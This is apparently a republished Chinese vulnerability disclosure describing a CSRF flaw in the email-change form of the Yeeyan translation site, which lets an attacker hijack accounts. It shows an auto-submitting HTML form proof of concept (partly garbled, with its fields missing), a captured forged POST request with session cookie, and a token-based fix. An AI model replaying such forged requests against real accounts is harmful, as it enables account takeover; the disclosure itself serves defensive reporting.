译言网CSRF账户劫持漏洞 - 网站安全

译言网CSRF账户劫持漏洞 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 由于网页表单验证不严格，导致可以提交恶意用户信息，网站用户面板中有一个功能是更换用户邮箱，这个表单可以被恶意提交不属于当前用户的邮件地址。详细说明：htmlH2CSRF Exploit...

由于网页表单验证不严格，导致可以提交恶意用户信息，网站用户面板中有一个功能是更换用户邮箱，这个表单可以被恶意提交不属于当前用户的邮件地址。

详细说明：

<html>

<H2>CSRF Exploit to add </H2>

<body>

</form>

document.form0.submit();

</script>

</body>

</html>

提交伪造数据的header 信息。

Request URL:http://member.yeeyan.org/my/profile/email?

Request Method:POST

Status Code:200 OK

Request Headersview source

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Charset:UTF-8,*;q=0.5

Accept-Encoding:gzip,deflate,sdch

Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cache-Control:max-age=0

Connection:keep-alive

Content-Length:157

Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryUBhOCXRqb1cABfRZ

Cookie:PHPSESSID=f6568962a1aafdfbf5719fa5d3400910; CakeCookie[ykey]=368997; __utma=68569166.1733295180.1354628709.1354813506.1354995318.3; __utmb=68569166.11.10.1354995318; __utmc=68569166; __utmz=68569166.1354813506.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E8%AF%91%E8%A8%80

Host:member.yeeyan.org

Origin:http://member.yeeyan.org

Referer:http://member.yeeyan.org/my/profile/email

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17

Request Payload

------WebKitFormBoundaryUBhOCXRqb1cABfRZ

Content-Disposition: form-data; name="data[email]"

email@domain.net

------WebKitFormBoundaryUBhOCXRqb1cABfRZ--

Response Headersview source

Connection:keep-alive

Content-Encoding:gzip

Content-Type:text/html

Date:Sat, 08 Dec 2012 19:44:04 GMT

P3P:CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Server:nginx/0.8.47

Transfer-Encoding:chunked

Vary:Accept-Encoding

X-Powered-By:PHP/5.2.14

修复方案：

在表单中放置token，提交的时候从服务端验证。

Nginx防范Sql注入攻击方法总结 - 网站安全 - 自学

游天下可暴力重置密码 - 网站安全 - 自学php

子栏目

译言网CSRF账户劫持漏洞 - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论